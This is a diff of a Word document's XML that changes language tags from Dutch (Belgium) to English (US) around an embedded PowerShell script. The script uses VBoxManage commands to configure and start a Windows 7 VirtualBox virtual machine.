+        <w:t xml:space="preserve"> --bootable on</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add virtual disk to storage controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storageattach</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hdd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'.\VDI\Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 7 Ultimate SP1 (64bit).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Define boot order</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>modifyvm</w:t>
       </w:r>
@@ -8762,616 +7228,51 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>cpus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>graphicscontroller</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vboxsvga</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vram</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>natnetwork</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --nat-network1 $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>NATNetworkName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --clipboard-mode </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>bidirectional</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --drag-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-drop </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>bidirectional</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>SATA storage</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> controller</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>storagectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --name 'SATA' --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>sata</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --controller </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>IntelAHCI</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>bootable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> virtual disk </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> storage controller</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>storageattach</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>storagectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>hdd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --medium '.\VDI\Windows 7 Ultimate SP1 (64bit).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vdi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Define</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> boot order</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>modifyvm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --boot1 disk --boot2 dvd --boot3 none --boot4 none</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --boot1 disk --boot2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --boot3 none --boot4 none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Start Windows VM</w:t>
       </w:r>
@@ -9381,15 +7282,15 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>VBoxManage</w:t>
@@ -9399,7 +7300,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -9408,7 +7309,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>startvm</w:t>
       </w:r>
@@ -9417,33 +7318,43 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --type gui</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
@@ -9453,14 +7364,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># 4. Finish Setup</w:t>
       </w:r>
@@ -9470,14 +7381,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
@@ -9487,34 +7398,16 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Read-Host -Prompt "Press Enter </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
